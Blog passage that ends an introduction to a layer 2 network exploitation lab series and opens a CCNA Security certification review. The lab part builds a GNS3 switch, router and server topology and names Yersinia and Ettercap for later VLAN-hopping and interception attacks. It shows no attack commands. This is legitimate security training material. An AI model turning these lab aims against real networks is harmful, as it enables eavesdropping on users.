<li>Both can access machines located in <em>Servers</em> (<abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> 3).</li>
</ul>
<p>The attacker is connected to the <em>Users</em> <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr>.</p>
<p>In this series we will see how the attacker can leverage various layer 2
configuration weaknesses to disrupt the network, hop from one <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> to another,
and intercept users’ communications, independently of their location in the topology.</p>
<p>We will limit ourselves to basic techniques, in an attempt to
demonstrate that pwning an insufficiently secured network doesn’t require any
advanced technology or knowledge.
When appropriate, we will also see how the attacks can be generalized to other
real-life scenarios.</p>
<h3 id="creating-the-topology"><a class="toclink" href="#creating-the-topology">Creating the topology</a></h3>
<p>This topology can be implemented using virtual machines and/or real gear.</p>
<h4 id="virtual-lab"><a class="toclink" href="#virtual-lab">Virtual lab</a></h4>
<p>On my side, I use <span class="caps">GNS3</span> to easily build such an infrastructure without having to
worry about the multiple issues that come with real gear (availability,
space, etc.).</p>
<p>For more information on how to set up the devices in a virtual lab, you
may want to check the various tutorials available in the <a href="https://www.whitewinterwolf.com/tags/lab/" rel="tag" title="View articles tagged 'lab'">lab</a> section.</p>
<p>I recommend building two versions of the same topology:</p>
<ul>
<li>
<p>One using Dynamips virtualized routers to act as the switches.</p>
</li>
<li>
<p>The other one using <span class="caps">IOU</span> emulated switches.</p>
<div class="admonition warning">
<p class="admonition-title">Warning</p>
<p>As <span class="caps">IOU</span> (sadly!) doesn’t tolerate loops in the topology, you will have to
remove the link between <span class="caps">ESW2</span> and <span class="caps">ESW3</span> in your <span class="caps">IOU</span>-based topology:</p>
<p><span class="lb-small"><a href="#esw2-esw3_remove.png" id="esw2-esw3_remove.png-thumb" title="Click to enlarge"><img alt="Remove the link between ESW2 and ESW3" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/esw2-esw3_remove.png"/></a></span></p>
<p>If you don’t do this, as soon as one of the end devices sends an <span class="caps">ARP</span>
broadcast, the <span class="caps">IOU</span> devices will enter a broadcast storm and consume
100% of your <span class="caps">CPU</span>.</p>
</div>
</li>
</ul>
<p>The other components remain the same in both versions of the topology.</p>
<p>Due to the limitations of each solution, some attacks or mitigation techniques
will only be possible in one version of the lab.
I will mention the compatible version throughout the series.</p>
<h4 id="real-gears"><a class="toclink" href="#real-gears">Real gear</a></h4>
<p>Using real gear is the best way to reproduce real-world
environments.
You can take the <span class="caps">IOU</span> switch configuration commands, which take advantage of <span class="caps">DTP</span>,
and adapt them to your hardware.</p>
<p>If you are short on devices, you won’t need the complete topology to be
available at any given time.
I will indicate the required devices at the beginning of each post so you can
focus on the devices needed for each part.</p>
<p>Moreover, the <em><span class="caps">ESW2</span></em> and <em><span class="caps">ESW3</span></em> switches can be merged into a single switch without
any major impact.
If possible, however, I recommend keeping them both, with the redundant link
between them, to get the most value out of these labs.</p>
<h3 id="setting-up-devices"><a class="toclink" href="#setting-up-devices">Setting up devices</a></h3>
<h4 id="iou-based-ethernet-switches"><a class="toclink" href="#iou-based-ethernet-switches"><span class="caps">IOU</span>-based ethernet switches</a></h4>
<p>The following commands apply to switches emulated using <span class="caps">IOU</span>.
They can also be used with real gear.</p>
<p><span class="caps">ESW1</span> is the core switch:</p>
<ul>
<li>All its interfaces are in trunk mode.</li>
<li>It is explicitly set as the <span class="caps">STP</span> primary root on all VLANs.</li>
</ul>
<p><span class="lb-small floatright"><a href="#esw1_iou.png" id="esw1_iou.png-thumb" title="Click to enlarge"><img alt="ESW1 ethernet switch" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/esw1_iou.png"/></a></span>
<span class="caps">ESW1</span> configuration (<span class="caps">IOU</span> version):</p>
<div class="codehilite"><pre><span class="k">conf</span> t
<span class="k">interface</span> range<span class="s"> ethernet 0/0, ethernet 1/0 - 3</span>
<span class="k">switchport</span> trunk encapsulation dot1q
<span class="k">switchport</span> mode trunk
<span class="nb">exit</span>
<span class="k">vtp </span>domain <span class="nv">WWWOLF</span>
<span class="k">vlan</span> <span class="s">2</span>
<span class="k">name </span><span class="nv">admins</span>
<span class="nb">exit</span>
<span class="k">vlan</span> <span class="s">3</span>
<span class="k">name </span><span class="nv">servers</span>
<span class="nb">exit</span>
<span class="k">spanning-tree</span> vlan <span class="s">1-3</span> root primary
<span class="nb">end</span>
<span class="k">copy</span> running-config startup-config
</pre></div>
<p><span class="lb-small floatright"><a href="#esw2_esw3_iou.png" id="esw2_esw3_iou.png-thumb" title="Click to enlarge"><img alt="ESW2 and ESW3 ethernet switches (IOU version)" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/esw2_esw3_iou.png"/></a></span>
<span class="caps">ESW2</span> and <span class="caps">ESW3</span> configure themselves automatically thanks to the <span class="caps">DTP</span> protocol (plug-and-play).</p>
<div class="admonition warning">
<p class="admonition-title">Warning</p>
<p>When using <span class="caps">IOU</span>, don’t forget to remove the direct link between <span class="caps">ESW2</span> and
<span class="caps">ESW3</span>.</p>
<p>This warning does not apply for real gear.</p>
</div>
<p><span class="caps">ESW4</span> and <span class="caps">ESW5</span> provide access to their own <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr>:</p>
<ul>
<li>
<p><span class="lb-small floatright"><a href="#esw4_iou.png" id="esw4_iou.png-thumb" title="Click to enlarge"><img alt="ESW4 ethernet switch" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/esw4_iou.png"/></a></span>
<span class="caps">ESW4</span> configuration (<span class="caps">IOU</span> version):</p>
<div class="codehilite"><pre><span class="k">conf</span> t
<span class="k">interface</span> range<span class="s"> ethernet 1/0 - 3</span>
<span class="k">switchport</span> access vlan <span class="s">2</span>
<span class="nb">end</span>
<span class="k">copy</span> running-config startup-config
</pre></div>
</li>
<li>
<p><span class="lb-small floatright"><a href="#esw5_iou.png" id="esw5_iou.png-thumb" title="Click to enlarge"><img alt="ESW5 ethernet switch" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/esw5_iou.png"/></a></span>
<span class="caps">ESW5</span> configuration (<span class="caps">IOU</span> version):</p>
<div class="codehilite"><pre><span class="k">conf</span> t
<span class="k">interface</span> range<span class="s"> ethernet 1/0 - 3</span>
<span class="k">switchport</span> access vlan <span class="s">3</span>
<span class="nb">end</span>
<span class="k">copy</span> running-config startup-config
</pre></div>
</li>
</ul>
<h4 id="router-based-ethernet-switches"><a class="toclink" href="#router-based-ethernet-switches">Router-based ethernet switches</a></h4>
<p>The following commands apply to c3725/c3745 routers equipped with an
EtherSwitch module to emulate switch devices.</p>
<p><span class="caps">ESW1</span> is the core switch:</p>
<ul>
<li>All its interfaces are in trunk mode.</li>
<li>It is explicitly set as the <span class="caps">STP</span> primary root on all VLANs.</li>
</ul>
<p><span class="lb-small floatright"><a href="#esw1.png" id="esw1.png-thumb" title="Click to enlarge"><img alt="ESW1 ethernet switch" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/esw1.png"/></a></span>
<span class="caps">ESW1</span> configuration (router-based version):</p>
<div class="codehilite"><pre><span class="k">conf</span> t
<span class="k">interface</span> range<span class="s"> fastEthernet 1/0 - 4</span>
<span class="k">switchport</span> trunk encapsulation dot1q
<span class="k">switchport</span> mode trunk
<span class="nb">exit</span>
<span class="k">vtp </span>domain <span class="nv">WWWOLF</span>
<span class="k">vlan</span> <span class="s">2</span>
<span class="k">name </span><span class="nv">admins</span>
<span class="nb">exit</span>
<span class="k">vlan</span> <span class="s">3</span>
<span class="k">name </span><span class="nv">servers</span>
<span class="nb">exit</span>
<span class="k">spanning-tree</span> vlan <span class="s">1</span> root primary
<span class="k">spanning-tree</span> vlan <span class="s">2</span> root primary
<span class="k">spanning-tree</span> vlan <span class="s">3</span> root primary
<span class="nb">end</span>
<span class="k">copy</span> running-config startup-config
</pre></div>
<p>With real Catalyst switches and <span class="caps">IOU</span>-based ones, <span class="caps">ESW2</span> and <span class="caps">ESW3</span> work by default
thanks to the <span class="caps">DTP</span> protocol.
Router-based ethernet switches, however, do not support <span class="caps">DTP</span> (security-wise it is
better that way…), so we need to configure them manually:</p>
<p><span class="lb-small floatright"><a href="#esw2_esw3.png" id="esw2_esw3.png-thumb" title="Click to enlarge"><img alt="ESW2 and ESW3 ethernet switches" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/esw2_esw3.png"/></a></span>
<span class="caps">ESW2</span> and <span class="caps">ESW3</span> configuration (router-based version):</p>
<div class="codehilite"><pre><span class="k">conf</span> t
<span class="k">vtp</span> mode client
<span class="k">interface</span> range<span class="s"> fastEthernet 1/0 - 1</span>
<span class="k">switchport</span> trunk encapsulation dot1q
<span class="k">switchport</span> mode trunk
<span class="nb">end</span>
<span class="k">copy</span> running-config startup-config
</pre></div>
<p><span class="caps">ESW4</span> and <span class="caps">ESW5</span> provide access to their own <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> (and, due to the lack of
<span class="caps">DTP</span>, the trunk port still needs to be configured manually):</p>
<ul>
<li>
<p><span class="lb-small floatright"><a href="#esw4.png" id="esw4.png-thumb" title="Click to enlarge"><img alt="ESW4 ethernet switch" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/esw4.png"/></a></span>
<span class="caps">ESW4</span> configuration (router-based version):</p>
<div class="codehilite"><pre><span class="k">conf</span> t
<span class="k">vtp</span> mode client
<span class="k">interface</span> range<span class="s"> fastEthernet 1/1 - 15</span>
<span class="k">switchport</span> access vlan <span class="s">2</span>
<span class="nb">exit</span>
<span class="k">interface</span><span class="s"> fastEthernet 1/0</span>
<span class="k">switchport</span> trunk encapsulation dot1q
<span class="k">switchport</span> mode trunk
<span class="nb">end</span>
<span class="k">copy</span> running-config startup-config
</pre></div>
</li>
<li>
<p><span class="lb-small floatright"><a href="#esw5.png" id="esw5.png-thumb" title="Click to enlarge"><img alt="ESW5 ethernet switch" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/esw5.png"/></a></span>
<span class="caps">ESW5</span> configuration (router-based version):</p>
<div class="codehilite"><pre><span class="k">conf</span> t
<span class="k">vtp</span> mode client
<span class="k">interface</span> range<span class="s"> fastEthernet 1/1 - 15</span>
<span class="k">switchport</span> access vlan <span class="s">3</span>
<span class="nb">exit</span>
<span class="k">interface</span><span class="s"> fastEthernet 1/0</span>
<span class="k">switchport</span> trunk encapsulation dot1q
<span class="k">switchport</span> mode trunk
<span class="nb">end</span>
<span class="k">copy</span> running-config startup-config
</pre></div>
</li>
</ul>
<h4 id="r1-main-router"><a class="toclink" href="#r1-main-router"><em>R1</em>: main router</a></h4>
<p>The main router provides the following services:</p>
<ul>
<li>Inter-<abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> routing.</li>
<li><span class="caps">DHCP</span> server for the VLANs 1 and 2 (the clients are given an address
belonging to the [*.100-*.199] range).</li>
<li>Firewall blocking any direct communication between <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> 1 and <abbr title="Virtual Local Area Network"><span class="caps">VLAN</span></abbr> 2.</li>
</ul>
<p><span class="lb-small floatright"><a href="#r1.png" id="r1.png-thumb" title="Click to enlarge"><img alt="R1 router" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/r1.png"/></a></span>
R1 configuration:</p>
<div class="codehilite"><pre><span class="k">conf</span> t
<span class="c1">! Firewall configuration</span>
<span class="k">class-map </span>type inspect match-any <span class="nv">ALL</span>
<span class="k">match</span> protocol tcp
<span class="k">match</span> protocol udp
<span class="k">match</span> protocol icmp
<span class="nb">exit</span>
<span class="k">policy-map </span>type inspect <span class="nv">INSPECT_ALL</span>
<span class="k">class </span>type inspect <span class="nv">ALL</span>
<span class="k">inspect</span>
<span class="nb">exit</span>
<span class="nb">exit</span>
<span class="k">zone </span>security <span class="nv">USERS</span>
<span class="nb">exit</span>
<span class="k">zone </span>security <span class="nv">ADMINS</span>
<span class="nb">exit</span>
<span class="k">zone </span>security <span class="nv">SERVERS</span>
<span class="nb">exit</span>
<span class="k">zone-pair </span>security <span class="nv">USERS-SERVERS </span>source <span class="nv">USERS </span>destination <span class="nv">SERVERS</span>
<span class="k">service-policy </span>type inspect <span class="nv">INSPECT_ALL</span>
<span class="nb">exit</span>
<span class="k">zone-pair </span>security <span class="nv">ADMINS-SERVERS </span>source <span class="nv">ADMINS </span>destination <span class="nv">SERVERS</span>
<span class="k">service-policy </span>type inspect <span class="nv">INSPECT_ALL</span>
<span class="nb">exit</span>
<span class="c1">! Interfaces configuration:</span>
<span class="k">interface</span><span class="s"> fastEthernet 0/0</span>
<span class="ow">no </span><span class="k">shutdown</span>
<span class="nb">exit</span>
<span class="k">interface</span><span class="s"> fastEthernet 0/0.1</span>
<span class="k">zone-member </span>security <span class="nv">USERS</span>
<span class="k">encapsulation</span> dot1Q <span class="s">1</span>
<span class="k">ip</span> address <span class="s">192.168.1.1</span> <span class="s">255.255.255.0</span>
<span class="nb">exit</span>
<span class="k">interface</span><span class="s"> fastEthernet 0/0.2</span>
<span class="k">zone-member </span>security <span class="nv">ADMINS</span>
<span class="k">encapsulation</span> dot1Q <span class="s">2</span>
<span class="k">ip</span> address <span class="s">192.168.2.1</span> <span class="s">255.255.255.0</span>
<span class="nb">exit</span>
<span class="k">interface</span><span class="s"> fastEthernet 0/0.3</span>
<span class="k">zone-member </span>security <span class="nv">SERVERS</span>
<span class="k">encapsulation</span> dot1Q <span class="s">3</span>
<span class="k">ip</span> address <span class="s">192.168.3.1</span> <span class="s">255.255.255.0</span>
<span class="nb">exit</span>
<span class="c1">! DHCP server configuration:</span>
<span class="k">ip</span> dhcp excluded-address <span class="s">192.168.1.0</span> <span class="s">192.168.1.99</span>
<span class="k">ip</span> dhcp excluded-address <span class="s">192.168.1.200</span> <span class="s">192.168.1.255</span>
<span class="k">ip </span>dhcp pool <span class="nv">VLAN1</span>
<span class="k">network</span> <span class="s">192.168.1.0</span> <span class="s">255.255.255.0</span>
<span class="k">default-router</span> <span class="s">192.168.1.1</span>
<span class="c1">! Normally you would also set the DNS server here.</span>
<span class="nb">exit</span>
<span class="k">ip</span> dhcp excluded-address <span class="s">192.168.2.0</span> <span class="s">192.168.2.99</span>
<span class="k">ip</span> dhcp excluded-address <span class="s">192.168.2.200</span> <span class="s">192.168.2.255</span>
<span class="k">ip </span>dhcp pool <span class="nv">VLAN2</span>
<span class="k">network</span> <span class="s">192.168.2.0</span> <span class="s">255.255.255.0</span>
<span class="k">default-router</span> <span class="s">192.168.2.1</span>
<span class="nb">exit</span>
<span class="nb">end</span>
<span class="k">copy</span> running-config startup-config
</pre></div>
<h4 id="server_1-a-shared-web-server"><a class="toclink" href="#server_1-a-shared-web-server"><em>Server_1</em>: a shared web server</a></h4>
<p><span class="lb-small floatright"><a href="#server-1.png" id="server-1.png-thumb" title="Click to enlarge"><img alt="server_1 server" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/server-1.png"/></a></span>
On my side I will use the <a href="https://bitnami.com/stack/wordpress" rel="external" title="Bitnami WordPress Stack (Bitnami)">Bitnami WordPress</a> image to act as the server.
Feel free to use anything you like, as long as there is some data to intercept.</p>
<div class="codehilite"><pre><span class="c"># If you need to change the keyboard layout (French layout here):</span>
sudo loadkeys fr
<span class="c"># To get a root shell (ONLY FOR LAB PURPOSES!)</span>
sudo -s
ifconfig eth0 192.168.3.100
<span class="c"># Avoid bug (?) from IOU by reducing the MTU to leave enough room</span>
<span class="c"># for the 802.1q VLAN tag (4 bytes), otherwise IOU drops large</span>
<span class="c"># packets outgoing the trunk interface with the error:</span>
<span class="c"># "LINK-4-TOOBIG: Interface Ethernet0/0, Output packet size of 1518 bytes too big"</span>
ifconfig eth0 mtu 1496
route add default gw 192.168.3.1
vi /etc/network/interfaces
<span class="c"># [...skipped...]</span>
auto eth0
iface eth0 inet static
address 192.168.3.100/24
gateway 192.168.3.1
mtu 1496
<span class="c"># [...skipped...]</span>
vi /etc/hosts
127.0.0.1 localhost
192.168.3.100 bitnami
<span class="c"># Force Apache to listen on the IPv4 interface instead of IPv6 ones</span>
vi /opt/bitnami/apache2/conf/httpd.conf
<span class="c"># [...skipped...]</span>
<span class="c"># Listen 80</span>
Listen 0.0.0.0:80
<span class="c"># [...skipped...]</span>
<span class="c"># To restart the services:</span>
service bitnami restart
</pre></div>
<h4 id="user_1-admin_1-clients"><a class="toclink" href="#user_1-admin_1-clients"><em>User_1</em>, <em>Admin_1</em>: clients</a></h4>
<p><span class="lb-small floatright"><a href="#user-1_admin-1.png" id="user-1_admin-1.png-thumb" title="Click to enlarge"><img alt="user_1 and admin_1 workstations" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/user-1_admin-1.png"/></a></span>
For them, on my side, I will use <span class="caps">GNS3</span>’s <a href="https://gns3.com/marketplace/appliance/firefox-guest" rel="external" title="Firefox guest (GNS3 Marketplace)">Firefox appliance</a>.
It is a super-light graphical Linux with Firefox.</p>
<ul>
<li>When creating the end-device template, don’t forget to edit the Qemu
options: <code>-vga std -usbdevice tablet -k fr</code>.</li>
<li>You have an icon in the dock to set the keyboard layout on the first boot.</li>
</ul>
<p>Ensure that <em>User_1</em> and <em>Admin_1</em> can both open <em>http://192.168.3.100</em> in
their browser:</p>
<p><span class="lb-small"><a href="#client.jpg" id="client.jpg-thumb" title="Click to enlarge"><img alt="Client accessing the server's homepage" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/client.jpg"/></a></span></p>
<h4 id="attacker-the-source-of-all-evil"><a class="toclink" href="#attacker-the-source-of-all-evil"><em>Attacker</em>: the source of all evil</a></h4>
<p><span class="lb-small floatright"><a href="#attacker.png" id="attacker.png-thumb" title="Click to enlarge"><img alt="attacker workstations" src="https://www.whitewinterwolf.com/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/attacker.png"/></a></span>
I will use <a href="https://backbox.org/" rel="external" title="BackBox project homepage">BackBox</a> Linux.
If you are more comfortable with another distribution, feel free to use it
instead.
We will mostly work with <a href="http://www.yersinia.net/" rel="external" title="Yersinia project homepage">Yersinia</a> and <a href="https://ettercap.github.io/ettercap/" rel="external" title="Ettercap project homepage">Ettercap</a>; ensure you have them
available on your system.</p>
<p><em>Attacker</em> can ping <em>User_1</em> but cannot ping <em>Admin_1</em>:</p>
<div class="codehilite"><pre><span class="gp">backbox@backbox:~$</span> ping -c <span class="m">1</span> 192.168.1.100
<span class="go">PING 192.168.1.100 (192.168.1.100) 56(84) bytes of data.</span>
<span class="go">64 bytes from 192.168.1.100: icmp_seq=1 ttl=64 time=0.919 ms</span>
<span class="go">--- 192.168.1.100 ping statistics ---</span>
<span class="go">1 packets transmitted, 1 received, 0% packet loss, time 0 ms</span>
<span class="go">rtt min/avg/max/mdev = 0.919/0.919/0.919/0.000 ms</span>
<span class="gp">backbox@backbox:~$</span> ping -c <span class="m">1</span> 192.168.2.100
<span class="go">PING 192.168.2.100 (192.168.2.100) 56(84) bytes of data.</span>
<span class="go">--- 192.168.2.100 ping statistics ---</span>
<span class="go">1 packets transmitted, 0 received, 100% packet loss, time 0 ms</span>
<span class="gp">backbox@backbox:~$</span>
</pre></div>
<p>The attacker also has access to <em>Server_1</em>.</p>Cisco CCNA Security certification review2017-09-01T00:00:00+02:002017-09-01T00:00:00+02:00WhiteWinterWolftag:www.whitewinterwolf.com,2017-09-01:/posts/2017/09/01/cisco-ccna-security-certification-review/<h3 id="the-five-ws"><a class="toclink" href="#the-five-ws">The five Ws</a></h3>
<ul>
<li>
<p><strong>What</strong>:
<span class="caps">CCNA</span> Security is a technical certification about general network security
in a professional context.
It describes the typical threats potentially affecting such networks, then the
various Cisco technologies that mitigate them.
This covers the networking devices themselves, but also data both in
transit and at rest, and end-user devices, both corporate and personal
ones (<abbr title="Bring Your Own Device"><span class="caps">BYOD</span></abbr>).</p>
</li>
<li>
<p><strong>When</strong>:
Obtaining this certification requires holding at least the <span class="caps">CCENT</span>
certification (I recommend having a <a href="/posts/2017/08/21/ccna-routing-switching-certification-review/" title="CCNA Routing & Switching certification review"><span class="caps">CCNA</span> Routing <span class="amp">&</span> Switching</a>, though).</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>While the <span class="caps">CCENT</span> or <span class="caps">CCNA</span> R&S is a prerequisite to be granted the
<span class="caps">CCNA</span> Security certification, they are not technically required to take
the exam.</p>
<p>If for some reason it suits you, Cisco allows you to take the <span class="caps">CCNA</span>
Security exam before having obtained a <span class="caps">CCENT</span> or <span class="caps">CCNA</span> R&S.
If you pass the exam, you will be granted the <span class="caps">CCNA</span> Security
certification once you get your <span class="caps">CCENT</span> or <span class="caps">CCNA</span> R&S.</p>
<p>Depending on your schedule, this might be something worth knowing.</p>
</div>
</li>
<li>
<p><strong>Why</strong>:
This certification demonstrates fundamental knowledge on threats affecting
corporate data networks and familiarity with Cisco technologies designed to
mitigate them.</p>
<p>For people in the <span class="caps">US</span>, this certification also officially meets the
<a href="https://www.cisco.com/c/en/us/training-events/training-certifications/certifications/associate/ccna-security/cnss-4011-recognition.html" rel="external" title="CCNA Security: CNSS 4011 Recognition (Cisco)"><span class="caps">NSA</span> / <span class="caps">CNSS</span> 4011</a> training standard and is <a href="https://www.cisco.com/c/en/us/training-events/training-certifications/certifications/associate/ccna-security/dod-8570.html" rel="external" title="CCNA Security: DoD 8570 Recognition (Cisco)">DoD 8570</a>
compliant, approved for the <span class="caps">IAT</span> Level <span class="caps">II</span>.
This may satisfy some of the requirements to be hired either directly by <span class="caps">US</span>
governmental entities or by consulting companies providing services to them.</p>
</li>
<li>
<p><strong>Who</strong>:
If you are interested in networking and in security, this certification
is an obvious choice.
Cisco technologies are widespread, and this certification provides the
opportunity to dig further into areas which are only scratched by the <span class="caps">CCNA</span> R&S
and to familiarize yourself with technologies such as Cisco’s <span class="caps">VPN</span>
and firewall products.</p>
</li>
<li>
<p><strong>Where</strong>:
You only need to pass one exam to get this certification.
It can be taken in any Pearson <span class="caps">VUE</span> test center.</p>
<p>This is a classical Cisco exam; it presents itself in the same fashion
as the <span class="caps">CCENT</span> and <span class="caps">CCNA</span> R&S exams: MCQs and lab simulations (the labs being
of course extended to cover the products specific to the <span class="caps">CCNA</span> Security curriculum).</p>
</li>
</ul>
<h3 id="training-material"><a class="toclink" href="#training-material">Training material</a></h3>
<h4 id="building-a-lab"><a class="toclink" href="#building-a-lab">Building a lab</a></h4>
<p>Let’s say it straight: devices and services deployment is out of scope for this
exam.
Cisco training material assumes that you are provided, either by your training
center or by your company, with access to ready-to-use environments for your
practical training.</p>
<p>When working on the <span class="caps">CCNA</span> R&S, there are enough documentation sources available
to know what you will need, and once you have your lab ready you can fully
dedicate yourself to the training step.</p>
<p>Here, chances are that your studies will frequently be brutally interrupted for
an unknown amount of time because the author suddenly adds a new service like
<em>“Configure your <span class="caps">CCP</span> as in the following screenshot”</em>, leaving you with a lot of
unanswered questions:</p>
<ul>
<li>What is a “<span class="caps">CCP</span>”?</li>
<li>Do I really need practical knowledge of this, or is it enough to just
learn it from a theoretical point of view from the book?</li>
<li>Where can I get it? Is it freely available?</li>
<li>Does the <span class="caps">CCNA</span> Security expect a specific version of the software?</li>
<li>How do I install it? What are the prerequisites and the installation process?</li>
<li>Why doesn’t it work? Is it because of a bug, an incompatibility, a wrong
setting in the emulator or in the operating system, or a license issue?</li>
<li>Several hours of debugging and Internet searches later, why does it still
not work?</li>
<li>How do I manage it? How do I make it interoperate with the rest of the
topology? How do I create an account for myself?</li>
</ul>
<p>And once you have been through this, you can go back to your studies… until the next
component is added.</p>
<p>From my personal experience, in addition to <span class="caps">CCNA</span> R&S components you also need
practical training on <a href="/posts/2017/08/28/how-to-install-cisco-adaptative-security-appliance-asa-in-gns3/" title="How to install Cisco Adaptative Security Appliance (ASA) in GNS3"><span class="caps">ASA</span> and <span class="caps">ASDM</span></a>, <a href="/posts/2017/08/28/how-to-install-cisco-secure-access-control-system-acs-server-in-gns3/" title="How to install Cisco Secure Access Control System (ACS) server in GNS3"><span class="caps">ACS</span></a>, <a href="/posts/2017/08/28/how-to-install-cisco-configuration-professional-ccp-in-gns3/" title="How to install Cisco Configuration Professional (CCP) in GNS3"><span class="caps">CCP</span></a> and <a href="/posts/2017/10/05/how-to-configure-windows-as-a-scep-server-cisco-asa-enrollment/" title="How to configure Windows as a SCEP server & Cisco ASA enrollment"><span class="caps">SCEP</span></a>.
Some other technologies are covered by the curriculum, such as end-device
security technologies, but having a general knowledge of what they are and
how they work from a high-level perspective is usually enough (at least that was
true for me, but keep in mind that the <span class="caps">CCNA</span> Security curriculum may evolve).</p>
<p>I’m currently completing the <a href="https://www.whitewinterwolf.com/tags/virtualization/" rel="tag" title="View articles tagged 'virtualization'">virtualization</a> section of
this site to cover the installation of the required components in your lab.
Moreover, you will also find invaluable information in <a href="https://www.youtube.com/watch?v=VgoFXwb1QvI" rel="external" title="Building a Cisco CCNA Security Virtual Lab (YouTube)">this video</a> by
Keith Barker.</p>
<h4 id="learning-resources"><a class="toclink" href="#learning-resources">Learning resources</a></h4>
<p>The <span class="caps">CCNA</span> Security is not a widespread certification compared to the <span class="caps">CCNA</span> R&S
for instance.
The main consequence is that very little documentation is available.</p>
<p>If you’ve read my <a href="/posts/2017/08/21/ccna-routing-switching-certification-review/" title="CCNA Routing & Switching certification review"><span class="caps">CCNA</span> Routing <span class="amp">&</span> Switching review</a>, you should have
read how satisfied I was with the <a href="https://www.subnetting.net" rel="external" title="Subnetting.net homepage">subnetting.net</a> website.
While I was studying for my <span class="caps">CCNA</span> Security, they were in the process of building
their <span class="caps">CCNA</span> Security course and it was not yet available.
By now their <span class="caps">CCNA</span> Security training material has become available.
I did not view it, so I cannot tell whether it is good or not, but given the
quality of their <span class="caps">CCNA</span> R&S material I highly recommend that you at least check it.</p>
<p>Other than that, you have Cisco’s official book and… not much else.
I guess that the <span class="caps">CCNA</span> Security curriculum attracts too few people and changes too
often to interest publishers (note though that while writing this article, I see
that Sybex announces <a href="https://www.amazon.com/CCNA-Security-Study-Guide-210-260/dp/1119409934?tag=electronicfro-20" rel="external" title="CCNA Security Study Guide: Exam 210-260 (Amazon)">a book</a> for January 2018; again I cannot vouch
for its content).</p>
<p><span class="lb-small floatright"><a href="#cisco_guide.jpg" id="cisco_guide.jpg-thumb" title="Click to enlarge"><img alt="Cover of the Cisco CCNA Security official cert guide" src="https://www.whitewinterwolf.com/posts/2017/09/01/cisco-ccna-security-certification-review/cisco_guide.jpg"/></a></span>
Cisco’s <a href="https://www.amazon.com/CCNA-Security-210-260-Official-Guide/dp/1587205661?tag=electronicfro-20" rel="external" title="CCNA Security 210-260 Official Cert Guide (Amazon)">official certification guide</a> is of poor quality.
In its defense, it is well written and what is explained is explained clearly,
but I have the strong feeling that it has been rushed and delivered in an
unfinished state.
The final product is therefore an incomplete book with missing parts (including
sections announced in the table of contents) and with some chapters mixed up.</p>
<p>To give a first example, there is no introduction to the <span class="caps">CCP</span> tool, except to
tell you that you need to know it (not even a mention of which version and
flavor is concerned; both the book and Cisco’s curriculum remain vague on this).
It is mentioned for the first time on page 41 and the author directly throws
screenshots at you. From where, how, what: you don’t know.
And as it happens, setting up a working <span class="caps">CCP</span> is not an easy matter without
prior knowledge of its specificities.</p>
<p>The best example of mixed-up chapters is chapter <em>5</em> about <span class="caps">PKI</span>
infrastructures, which assumes that you have already read chapter <em>8</em>, which
introduces the <span class="caps">ASA</span> to the reader:</p>
<blockquote>
<p>What I want to do now is walk you through an example of applying these
concepts to some devices you are already familiar with if you have read the
previous portions of this book.
Both the <em>Adaptive Security Appliance (<span class="caps">ASA</span>)</em> and Cisco routers can use
digital certificates.
Let’s take a look at installing digital certificates on the <span class="caps">ASA</span>, using the
<em>Adaptive Security Device Manager (<span class="caps">ASDM</span>)</em>.</p>
</blockquote>
<p>This is page 107 of the book, and is your first contact with these tools you
are anything but <em>“familiar”</em> with.
What the frustrated reader may not know is that this book indeed contains
an introduction to the <span class="caps">ASA</span> device, but it is buried a hundred pages later, in
chapter 8 about <em>Implementing <span class="caps">SSL</span> VPNs using Cisco <span class="caps">ASA</span></em>.
The reader may assume this is the same thing as with <span class="caps">CCP</span> and that he is just
supposed to learn how to deploy and administrate <span class="caps">ASA</span> systems on the fly before
continuing to read.</p>
<p>But chapters are not only mixed up, and the <span class="caps">CCP</span> presentation is not the only
thing missing.
This book is incomplete as per the exam requirements.
If it is your only source of study, you <em>will</em> fail<sup id="fnref-failure"><a class="footnote-ref" href="#fn-failure">2</a></sup>.</p>
<p>Here are the missing parts from this book with a link to the material I used
to complement my learning:</p>
<ul>
<li>
<p>802.1X: The table presented in the introduction chapters shows that it was
intended to be covered in the fourth chapter, but the whole section is
missing from the book.
Read Cisco’s <a href="https://www.cisco.com/c/en/us/td/docs/solutions/Enterprise/Security/TrustSec_1-99/Dot1X_Deployment/Dot1x_Dep_Guide.html?referring_site=RE&pos=2&page=http://www.cisco.com/c/en/us/td/docs/ios/12_4t/12_4t11/ht_8021x.html" rel="external" title="Wired 802.1X Deployment Guide (Cisco)">Wired 802.1X Deployment Guide</a>.</p>
</li>
<li>
<p><span class="caps">ACS</span> authentication protocols (<span class="caps">PAP</span>, <span class="caps">CHAP</span> and <span class="caps">EAP</span>-based ones) are extensively
tested during the exam but not even mentioned in the book.
Read the relevant chapter in the
